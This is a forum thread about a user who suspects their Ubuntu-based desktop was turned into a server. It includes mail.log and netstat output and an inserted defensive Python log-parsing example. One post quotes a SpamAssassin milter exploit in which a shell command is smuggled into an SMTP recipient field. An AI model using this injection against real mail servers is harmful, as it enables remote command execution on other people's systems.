Someone turned my desktop into a server

    #31
    Postfix is a mail transfer agent (MTA) used for sending email between servers.

    Let's see what it has been up to:

    Code:
    cat /var/log/mail.log
    samhobbs.co.uk



      #32
      While I do that, look at what I found

      SpamAssassin Milter Plugin 'mlfi_envrcpt()' Remote Arbitrary Command Injection Vulnerability

      An attacker can exploit the issue using readily available tools.

      The following example commands are available:

      $ nc localhost 25
      220 ownthabox ESMTP Postfix (Ubuntu)
      mail from: me () me com
      250 2.1.0 Ok
      rcpt to: root+:"|touch /tmp/foo"
      250 2.1.5 Ok
      From here http://www.securityfocus.com/bid/38578/exploit



        #33
        Code:
        cat /var/log/mail.log
        Oct  9 02:08:19 rafal-desktop postfix/master[8547]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 02:09:30 rafal-desktop postfix/master[8547]: terminating on signal 15
        Oct  9 02:15:42 rafal-desktop postfix/master[26859]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 02:35:58 rafal-desktop postfix/master[1574]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 02:36:17 rafal-desktop postfix/master[1574]: reload -- version 2.11.0, configuration /etc/postfix
        Oct  9 03:38:59 rafal-desktop postfix/master[1594]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 03:39:21 rafal-desktop postfix/master[1594]: reload -- version 2.11.0, configuration /etc/postfix
        Oct  9 15:18:09 rafal-desktop postfix/master[1586]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 15:18:51 rafal-desktop postfix/master[1586]: reload -- version 2.11.0, configuration /etc/postfix
        Oct  9 15:54:36 rafal-desktop postfix/master[1587]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 15:55:09 rafal-desktop postfix/master[1587]: reload -- version 2.11.0, configuration /etc/postfix
        Oct  9 22:05:40 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 22:06:12 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix
        Oct  9 22:34:11 rafal-desktop postfix/master[1619]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct  9 22:34:34 rafal-desktop postfix/master[1619]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 10 12:00:29 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 10 12:00:59 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:38:55 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:39:39 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:45:41 rafal-desktop postfix/master[1578]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:45:59 rafal-desktop postfix/master[1578]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:55:23 rafal-desktop postfix/master[1596]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 00:55:44 rafal-desktop postfix/master[1596]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 14:16:41 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 14:19:56 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 19:32:32 rafal-desktop postfix/master[1539]: terminating on signal 15
        Oct 11 19:33:18 rafal-desktop postfix/master[1560]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 19:33:35 rafal-desktop postfix/master[1560]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 19:33:36 rafal-desktop postfix/master[1560]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:45:19 rafal-desktop postfix/master[1560]: terminating on signal 15
        Oct 11 23:46:16 rafal-desktop postfix/master[1668]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:46:35 rafal-desktop postfix/master[1668]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:46:35 rafal-desktop postfix/master[1668]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:48:17 rafal-desktop postfix/master[1668]: terminating on signal 15
        Oct 11 23:49:02 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:49:23 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:49:23 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:52:54 rafal-desktop postfix/master[1563]: terminating on signal 15
        Oct 11 23:53:59 rafal-desktop postfix/master[1575]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:54:20 rafal-desktop postfix/master[1575]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 11 23:54:20 rafal-desktop postfix/master[1575]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 00:11:53 rafal-desktop postfix/pickup[2552]: 80135C0055: uid=1000 from=<rafal>
        Oct 12 00:11:53 rafal-desktop postfix/cleanup[3864]: 80135C0055: message-id=<20141011221153.80135C0055@rafal-desktop>
        Oct 12 00:11:53 rafal-desktop postfix/qmgr[2553]: 80135C0055: from=<rafal@rafal-desktop>, size=508, nrcpt=1 (queue active)
        Oct 12 00:11:53 rafal-desktop postfix/local[3866]: 80135C0055: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.04, delays=0.02/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
        Oct 12 00:11:53 rafal-desktop postfix/qmgr[2553]: 80135C0055: removed
        Oct 12 01:00:02 rafal-desktop postfix/master[1575]: terminating on signal 15
        Oct 12 17:06:55 rafal-desktop postfix/master[1589]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 17:07:38 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 17:07:38 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 18:04:51 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 18:04:56 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 18:57:05 rafal-desktop postfix/master[1589]: terminating on signal 15
        Oct 12 18:58:05 rafal-desktop postfix/master[1520]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 18:58:52 rafal-desktop postfix/master[1520]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 19:45:30 rafal-desktop postfix/master[1520]: terminating on signal 15
        Oct 12 21:21:15 rafal-desktop postfix/master[1581]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 21:21:37 rafal-desktop postfix/master[1581]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:00:11 rafal-desktop postfix/master[1581]: terminating on signal 15
        Oct 12 22:00:55 rafal-desktop postfix/master[1558]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:01:16 rafal-desktop postfix/master[1558]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:17:59 rafal-desktop postfix/master[1558]: terminating on signal 15
        Oct 12 22:18:44 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:19:06 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:32:23 rafal-desktop postfix/master[1585]: terminating on signal 15
        Oct 12 22:35:08 rafal-desktop postfix/master[1612]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 12 22:35:34 rafal-desktop postfix/master[1612]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 12 23:08:46 rafal-desktop postfix/master[1612]: terminating on signal 15
        Oct 13 05:03:27 rafal-desktop postfix/master[1628]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 05:03:52 rafal-desktop postfix/master[1628]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 05:15:14 rafal-desktop postfix/master[1628]: terminating on signal 15
        Oct 13 05:16:15 rafal-desktop postfix/master[1677]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 05:16:39 rafal-desktop postfix/master[1677]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 05:19:36 rafal-desktop postfix/master[1677]: terminating on signal 15
        Oct 13 05:35:10 rafal-desktop postfix/master[1666]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 05:35:30 rafal-desktop postfix/master[1666]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 07:27:24 rafal-desktop postfix/master[1666]: terminating on signal 15
        Oct 13 18:36:55 rafal-desktop postfix/master[1635]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 18:37:31 rafal-desktop postfix/master[1635]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 18:59:05 rafal-desktop postfix/master[1635]: terminating on signal 15
        Oct 13 19:00:04 rafal-desktop postfix/master[1705]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 19:00:23 rafal-desktop postfix/master[1705]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:13:57 rafal-desktop postfix/master[1705]: terminating on signal 15
        Oct 13 20:15:04 rafal-desktop postfix/master[1631]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:15:21 rafal-desktop postfix/master[1631]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:24:41 rafal-desktop postfix/master[1631]: terminating on signal 15
        Oct 13 20:44:20 rafal-desktop postfix/master[1666]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:44:37 rafal-desktop postfix/master[1666]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:52:58 rafal-desktop postfix/master[1666]: terminating on signal 15
        Oct 13 20:53:58 rafal-desktop postfix/master[1646]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 20:54:16 rafal-desktop postfix/master[1646]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 21:04:56 rafal-desktop postfix/master[1646]: terminating on signal 15
        Oct 13 21:05:44 rafal-desktop postfix/master[1630]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 21:06:01 rafal-desktop postfix/master[1630]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 13 21:08:15 rafal-desktop postfix/master[1630]: terminating on signal 15
        Oct 13 21:09:46 rafal-desktop postfix/master[1628]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 13 21:10:03 rafal-desktop postfix/master[1628]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 14 00:10:07 rafal-desktop postfix/master[1628]: terminating on signal 15
        Oct 14 08:33:30 rafal-desktop postfix/master[1667]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 14 08:34:10 rafal-desktop postfix/master[1667]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 14 13:42:54 rafal-desktop postfix/master[1623]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 14 13:43:11 rafal-desktop postfix/master[1623]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 14 14:49:49 rafal-desktop postfix/master[1623]: terminating on signal 15
        Oct 14 14:50:49 rafal-desktop postfix/master[1670]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 14 14:51:20 rafal-desktop postfix/master[1670]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 14 15:40:42 rafal-desktop postfix/master[1670]: terminating on signal 15
        Oct 14 15:41:46 rafal-desktop postfix/master[1681]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 14 15:42:12 rafal-desktop postfix/master[1681]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 14 16:08:56 rafal-desktop postfix/master[1681]: terminating on signal 15
        Oct 14 16:12:13 rafal-desktop postfix/master[1651]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 14 16:14:46 rafal-desktop postfix/master[1651]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 15 03:15:34 rafal-desktop postfix/master[1651]: terminating on signal 15
        Oct 15 15:18:05 rafal-desktop postfix/master[1654]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 15 15:18:30 rafal-desktop postfix/master[1654]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 15 22:49:21 rafal-desktop postfix/master[1654]: terminating on signal 15
        Oct 15 22:50:29 rafal-desktop postfix/master[1785]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 15 22:50:57 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 07:57:31 rafal-desktop postfix/pickup[22837]: C9BB8C3797: uid=0 from=<root>
        Oct 16 07:57:31 rafal-desktop postfix/cleanup[24838]: C9BB8C3797: message-id=<20141016055731.C9BB8C3797@rafal-desktop>
        Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: from=<root@rafal-desktop>, size=622, nrcpt=1 (queue active)
        Oct 16 07:57:31 rafal-desktop postfix/local[24841]: C9BB8C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.12, delays=0.08/0.04/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
        Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: removed
        Oct 16 11:35:33 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 11:35:38 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 11:43:07 rafal-desktop postfix/pickup[802]: 58676C3797: uid=1000 from=<rafal>
        Oct 16 11:43:07 rafal-desktop postfix/cleanup[1272]: 58676C3797: message-id=<20141016094307.58676C3797@rafal-desktop>
        Oct 16 11:43:07 rafal-desktop postfix/qmgr[801]: 58676C3797: from=<rafal@rafal-desktop>, size=520, nrcpt=1 (queue active)
        Oct 16 11:43:07 rafal-desktop postfix/local[1274]: 58676C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.14, delays=0.09/0.04/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
        Oct 16 11:43:07 rafal-desktop postfix/qmgr[801]: 58676C3797: removed
        Oct 16 11:45:23 rafal-desktop postfix/pickup[802]: 343D4C3797: uid=1000 from=<rafal>
        Oct 16 11:45:23 rafal-desktop postfix/cleanup[1414]: 343D4C3797: message-id=<20141016094523.343D4C3797@rafal-desktop>
        Oct 16 11:45:23 rafal-desktop postfix/qmgr[801]: 343D4C3797: from=<rafal@rafal-desktop>, size=506, nrcpt=1 (queue active)
        Oct 16 11:45:23 rafal-desktop postfix/local[1416]: 343D4C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.11, delays=0.07/0.03/0/0, dsn=2.0.0, status=sent (delivered to mailbox)
        Oct 16 11:45:23 rafal-desktop postfix/qmgr[801]: 343D4C3797: removed
        Oct 16 14:58:42 rafal-desktop postfix/master[1785]: terminating on signal 15
        Oct 16 18:32:16 rafal-desktop postfix/master[1591]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 16 18:32:36 rafal-desktop postfix/master[1591]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 18:56:23 rafal-desktop postfix/master[1591]: terminating on signal 15
        Oct 16 18:57:16 rafal-desktop postfix/master[1653]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 16 18:57:59 rafal-desktop postfix/master[1653]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 19:21:00 rafal-desktop postfix/master[1653]: terminating on signal 15
        Oct 16 19:22:05 rafal-desktop postfix/master[1594]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 16 19:22:33 rafal-desktop postfix/master[1594]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 16 22:38:39 rafal-desktop postfix/master[1594]: terminating on signal 15
        Oct 16 22:39:48 rafal-desktop postfix/master[1606]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 16 22:40:31 rafal-desktop postfix/master[1606]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 17 01:29:54 rafal-desktop postfix/master[1606]: terminating on signal 15
        Oct 17 01:44:11 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 17 01:44:37 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 17 05:31:58 rafal-desktop postfix/master[1571]: terminating on signal 15
        Oct 17 12:54:57 rafal-desktop postfix/master[1790]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 17 12:55:32 rafal-desktop postfix/master[1790]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 17 23:52:47 rafal-desktop postfix/master[1790]: terminating on signal 15
        Oct 17 23:53:40 rafal-desktop postfix/master[1521]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 17 23:54:07 rafal-desktop postfix/master[1521]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 17 23:56:56 rafal-desktop postfix/master[1521]: terminating on signal 15
        Oct 17 23:58:03 rafal-desktop postfix/master[1545]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 17 23:58:30 rafal-desktop postfix/master[1545]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:02:23 rafal-desktop postfix/master[1545]: terminating on signal 15
        Oct 18 00:10:05 rafal-desktop postfix/master[1583]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:10:32 rafal-desktop postfix/master[1583]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:14:01 rafal-desktop postfix/master[1583]: terminating on signal 15
        Oct 18 00:15:06 rafal-desktop postfix/master[1647]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:15:49 rafal-desktop postfix/master[1647]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:17:46 rafal-desktop postfix/master[1647]: terminating on signal 15
        Oct 18 00:18:33 rafal-desktop postfix/master[1587]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 18 00:19:05 rafal-desktop postfix/master[1587]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 18 01:35:34 rafal-desktop postfix/master[1587]: terminating on signal 15
        Oct 18 15:08:56 rafal-desktop postfix/master[1508]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 18 15:09:23 rafal-desktop postfix/master[1508]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 19 03:10:06 rafal-desktop postfix/master[1508]: terminating on signal 15
        Oct 19 15:23:04 rafal-desktop postfix/master[1569]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 19 15:23:38 rafal-desktop postfix/master[1569]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 20 00:12:47 rafal-desktop postfix/master[1569]: terminating on signal 15
        Oct 20 12:53:31 rafal-desktop postfix/master[1568]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 20 12:54:03 rafal-desktop postfix/master[1568]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 20 14:23:51 rafal-desktop postfix/master[1568]: terminating on signal 15
        Oct 20 14:24:39 rafal-desktop postfix/master[1523]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 20 14:25:00 rafal-desktop postfix/master[1523]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 20 23:31:30 rafal-desktop postfix/master[1523]: terminating on signal 15
        Oct 21 13:38:29 rafal-desktop postfix/master[1593]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 21 13:39:01 rafal-desktop postfix/master[1593]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 21 17:05:20 rafal-desktop postfix/master[1593]: terminating on signal 15
        Oct 21 17:26:26 rafal-desktop postfix/master[1637]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 21 17:27:26 rafal-desktop postfix/master[1637]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 21 17:27:51 rafal-desktop postfix/master[1637]: terminating on signal 15
        Oct 21 17:43:30 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 21 17:43:48 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 21 23:44:57 rafal-desktop postfix/master[1571]: terminating on signal 15
        Oct 22 15:38:24 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 22 15:41:55 rafal-desktop postfix/master[1563]: terminating on signal 15
        Oct 22 16:03:56 rafal-desktop postfix/master[1558]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 22 16:04:38 rafal-desktop postfix/master[1558]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 22 21:39:01 rafal-desktop postfix/master[1558]: terminating on signal 15
        Oct 22 21:47:29 rafal-desktop postfix/master[1490]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 22 21:47:50 rafal-desktop postfix/master[1490]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 22 23:41:06 rafal-desktop postfix/master[1490]: terminating on signal 15
        Oct 22 23:41:57 rafal-desktop postfix/master[1572]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 22 23:42:19 rafal-desktop postfix/master[1572]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 23 00:25:00 rafal-desktop postfix/master[1572]: terminating on signal 15
        Oct 23 08:15:14 rafal-desktop postfix/master[1581]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 23 08:15:51 rafal-desktop postfix/master[1581]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 23 10:04:26 rafal-desktop postfix/master[1581]: terminating on signal 15
        Oct 23 17:46:16 rafal-desktop postfix/master[1516]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 23 17:52:31 rafal-desktop postfix/master[1516]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 02:43:31 rafal-desktop postfix/master[1516]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 02:44:48 rafal-desktop postfix/master[1516]: terminating on signal 15
        Oct 24 02:45:36 rafal-desktop postfix/master[1586]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 24 02:47:31 rafal-desktop postfix/master[1586]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 05:44:34 rafal-desktop postfix/master[1586]: terminating on signal 15
        Oct 24 05:45:25 rafal-desktop postfix/master[1522]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 24 05:46:14 rafal-desktop postfix/master[1522]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 09:05:06 rafal-desktop postfix/master[1522]: terminating on signal 15
        Oct 24 09:05:52 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 24 09:06:33 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 12:13:56 rafal-desktop postfix/master[1585]: terminating on signal 15
        Oct 24 21:23:36 rafal-desktop postfix/master[1576]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 24 21:24:01 rafal-desktop postfix/master[1576]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 21:29:59 rafal-desktop postfix/master[1576]: terminating on signal 15
        Oct 24 23:02:16 rafal-desktop postfix/master[1569]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 24 23:02:36 rafal-desktop postfix/master[1569]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 24 23:59:54 rafal-desktop postfix/master[1569]: terminating on signal 15
        Oct 25 16:44:49 rafal-desktop postfix/master[1605]: daemon started -- version 2.11.0, configuration /etc/postfix
        Oct 25 16:45:51 rafal-desktop postfix/master[1605]: reload -- version 2.11.0, configuration /etc/postfix
        Oct 25 16:48:33 rafal-desktop postfix/smtpd[3245]: connect from localhost[127.0.0.1]
        Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: timeout after UNKNOWN from localhost[127.0.0.1]
        Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: disconnect from localhost[127.0.0.1]
        Oct 25 17:16:37 rafal-desktop postfix/master[1605]: terminating on signal 15



          #34
          I uninstalled postfix and this is current netstat -l
          Code:
          Active Internet connections (only servers)
          Proto Recv-Q Send-Q Local Address           Foreign Address         State      
          tcp        0      0 rafal-desktop:domain    *:*                     LISTEN     
          tcp        0      0 localhost:ipp           *:*                     LISTEN     
          tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN     
          udp        0      0 *:37027                 *:*                                
          udp        0      0 *:mdns                  *:*                                
          udp        0      0 rafal-desktop:domain    *:*                                
          udp        0      0 *:ipp                   *:*                                
          udp6       0      0 [::]:mdns               [::]:*                             
          udp6       0      0 [::]:55549              [::]:*



            #35
            Originally posted by Feathers McGraw
            Postfix is a mail transfer agent (MTA) used for sending email between servers.

            Let's see what it has been up to:

            Code:
            cat /var/log/mail.log
            Right, you said servers, I am using a desktop



              #36
              This is what I found in /tmp



                #37
                There's nothing in that mail.log that suggests any email has been sent out from your computer, which is what I was looking for. The only two messages in there seem to be from root to root, probably "three wrong sudo password attempts" emails.

                In short, you have nothing to worry about. Do you remember installing postfix? When you uninstalled it, did you get any messages about dependencies? I'm wondering if it was pulled in by something else you installed.
                samhobbs.co.uk

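The check Feathers does by eye above (did any message leave the machine?) can be done programmatically over a Postfix mail.log. This is an added example, not code from the thread: it parses the log format shown in post #33 (qmgr `from=` lines, local/smtp `to=` lines with `relay=`, smtpd `connect from`) and flags deliveries whose relay is not `local`; the sample log is constructed from the thread's lines, with the final two (queue id 1234ABCD01, mx.example.net, 192.0.2.10) invented to show what outbound mail would look like.

```python
import re
from collections import Counter

# Constructed sample: the first seven lines follow entries shown in the thread, the
# last two (queue id 1234ABCD01 relayed to mx.example.net) are invented so that the
# outbound check below has something to find.
SAMPLE_LOG = """\
Oct 16 07:57:31 rafal-desktop postfix/pickup[22837]: C9BB8C3797: uid=0 from=<root>
Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: from=<root@rafal-desktop>, size=622, nrcpt=1 (queue active)
Oct 16 07:57:31 rafal-desktop postfix/local[24841]: C9BB8C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.12, delays=0.08/0.04/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: removed
Oct 25 16:48:33 rafal-desktop postfix/smtpd[3245]: connect from localhost[127.0.0.1]
Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: timeout after UNKNOWN from localhost[127.0.0.1]
Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: disconnect from localhost[127.0.0.1]
Oct 25 17:05:02 rafal-desktop postfix/qmgr[2513]: 1234ABCD01: from=<www-data@rafal-desktop>, size=1402, nrcpt=1 (queue active)
Oct 25 17:05:03 rafal-desktop postfix/smtp[3301]: 1234ABCD01: to=<someone@example.net>, relay=mx.example.net[192.0.2.10]:25, delay=1.1, delays=0.1/0/0.4/0.6, dsn=2.0.0, status=sent (250 OK queued)
"""

# A message entering the active queue: who is sending, how big, how many recipients.
QUEUED_RE = re.compile(
    r"postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): from=<(?P<sender>[^>]*)>, "
    r"size=(?P<size>\d+), nrcpt=(?P<nrcpt>\d+)"
)
# A delivery attempt by one of Postfix's delivery agents.
DELIVERY_RE = re.compile(
    r"postfix/(?P<agent>local|virtual|smtp|lmtp|pipe|error)\[\d+\]: (?P<qid>[0-9A-F]+): "
    r"to=<(?P<rcpt>[^>]*)>.*?relay=(?P<relay>[^,]+),.*?status=(?P<status>\w+)"
)
# An inbound SMTP client connecting to smtpd.
CONNECT_RE = re.compile(r"postfix/smtpd\[\d+\]: connect from (?P<client>\S+)")

# Relay values that mean the message stayed on this machine (or was dropped).
LOCAL_RELAYS = {"local", "virtual", "none"}


def parse_deliveries(log_text):
    """Return one dict per delivery attempt ('to=' line) found in the log."""
    deliveries = []
    for line in log_text.splitlines():
        m = DELIVERY_RE.search(line)
        if m:
            deliveries.append(m.groupdict())
    return deliveries


def outbound_deliveries(log_text):
    """Deliveries handed to a remote relay, i.e. mail that actually left the host."""
    return [d for d in parse_deliveries(log_text) if d["relay"] not in LOCAL_RELAYS]


def summarize(log_text):
    """The counts a defender wants at a glance: what was queued, where it went, who connected."""
    senders, relays, clients = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        if m := QUEUED_RE.search(line):
            senders[m["sender"]] += 1
        if m := DELIVERY_RE.search(line):
            relays[m["relay"]] += 1
        if m := CONNECT_RE.search(line):
            clients[m["client"]] += 1
    return {
        "queued_by_sender": dict(senders),
        "deliveries_by_relay": dict(relays),
        "smtpd_clients": dict(clients),
        "outbound": len(outbound_deliveries(log_text)),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
    for d in outbound_deliveries(SAMPLE_LOG):
        print(f"LEFT THE HOST: {d['qid']} to {d['rcpt']} via {d['relay']}")
```

Run against the real file (`summarize(open("/var/log/mail.log").read())`), a non-empty `outbound` count or an unexpected sender such as a web server account is what would justify the worry in this thread; relay=local deliveries from root to root do not.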


                  #38
                  I have never installed postfix. When I uninstalled it, no dependencies popped up. I use the --no-install-recommends switch when installing something now, but I am worried: I am unable to install any other distro, I always get a KVM disabled message, it is as if this person or persons only want me to use *buntu so they can exploit it. Not to mention my ISP switched our router this year to one of the most security..... think cheese full of holes, the Technicolor TC7200, and I am not allowed to bridge with this router/modem, it is a *hybrid* 2-in-1.
                  Last edited by raffytaffy; Oct 25, 2014, 10:02 AM.



                    #39
                    Originally posted by johndoe
                    Right, you said servers, I am using a desktop
                    I use Kubuntu as my server OS. The only differences between a "desktop" and a "server" are the programs that are installed and the fact that a server is typically always on.

                    BTW your attachment link is broken.
                    samhobbs.co.uk



                      #40
